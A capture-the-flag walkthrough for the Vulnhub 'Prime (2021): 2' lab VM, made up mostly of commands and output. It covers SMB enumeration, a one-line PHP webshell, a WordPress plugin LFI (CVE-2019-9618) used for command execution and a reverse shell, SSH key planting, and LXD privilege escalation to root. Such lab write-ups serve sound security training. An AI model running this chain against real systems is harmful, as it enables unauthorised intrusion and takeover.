Vulnhub Prime (2021): 2 Walkthrough
https://www.vulnhub.com/entry/prime-2021-2,696/
Scan ports.
# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
Nmap scan report for 192.168.33.139 (192.168.33.139)
Host is up (0.0041s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
| 256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_ 256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10123/tcp open http SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
|_http-title: Directory listing for /
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 7h59m59s
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-12T18:00:05
|_ start_date: N/A
List the SMB shares (anonymous access works; just press Enter at the password prompt).
smbclient -L 192.168.33.139
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
welcome Disk Welcome to Hackerctf LAB
IPC$ IPC IPC Service (hackerctflab server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
The welcome share is somebody's home directory (note .bash_history, .mysql_history, .ssh and .sudo_as_admin_successful), and it contains upload/shell.php.
smbclient '\\192.168.33.139\welcome'
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021
19475088 blocks of size 1024. 9885876 blocks available
smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021
19475088 blocks of size 1024. 9885872 blocks available
smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>
Check shell.php.
cat shell.php
<?php echo system($_GET['cmd']);?>
The file "something" gives away the user name jarves, so the share is /home/jarves.
cat something
I wanted to make it my home directory. But idea must be changed.
Thanks,
jarves
Directory scan of port 80 (output saved to 80.log); /wp is a WordPress install.
cat 80.log
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]
Run wpscan against the WordPress install under /wp/ with user and plugin enumeration: it finds one user (admin) and one plugin with a known vulnerability.
wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
...
[+] gracemedia-media-player
 | Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 | Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
...
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
The plugin has a local file inclusion bug (CVE-2019-9618); searchsploit has the write-up with the vulnerable endpoint and parameter.
searchsploit gracemedia
------------------------------------------------------------------- ------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion | php/webapps/46537.txt
Confirm the LFI by including /etc/passwd through the cfg parameter of ajax_controller.php (the surplus ../ components are harmless, since the parent of / is /).
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...
Since the welcome share is /home/jarves, the LFI can include the uploaded webshell at /home/jarves/upload/shell.php, which then runs whatever is in the cmd parameter as www-data. The line appears twice because shell.php does echo system(...): system() prints the command output itself and also returns its last line, which echo prints once more.
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Start a listener, then visit the same address with a reverse-shell command (URL-encoded) in the cmd parameter.
nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$
<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Another route straight to an SSH login as jarves: the welcome share is jarves's home directory and it is writable, so upload an authorized_keys file into .ssh over SMB.
smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.
The chmod fails because this Samba server does not expose UNIX extensions, but it does not matter: sshd (with StrictModes on) only rejects an authorized_keys file that is group- or world-writable, and the mode Samba gives a new file with its default create mask (0744) passes that check, so ssh -i <key> jarves@192.168.33.139 works.
Check group of jarves.
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
jarves is in the lxd group, so use the classic lxd privilege escalation: start a privileged container with the host's root filesystem mounted inside it. The Alpine image tarball has to be transferred to the box first (the writable welcome share is one way), and if LXD has never been initialised a storage pool is needed before anything else, so run lxd init once and accept the defaults.
lxd init --auto
lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
Now we are root.
jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
Inside the container the host filesystem is under /mnt/root, so drop an authorized_keys into /mnt/root/root/.ssh/ and SSH in directly as root.
ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab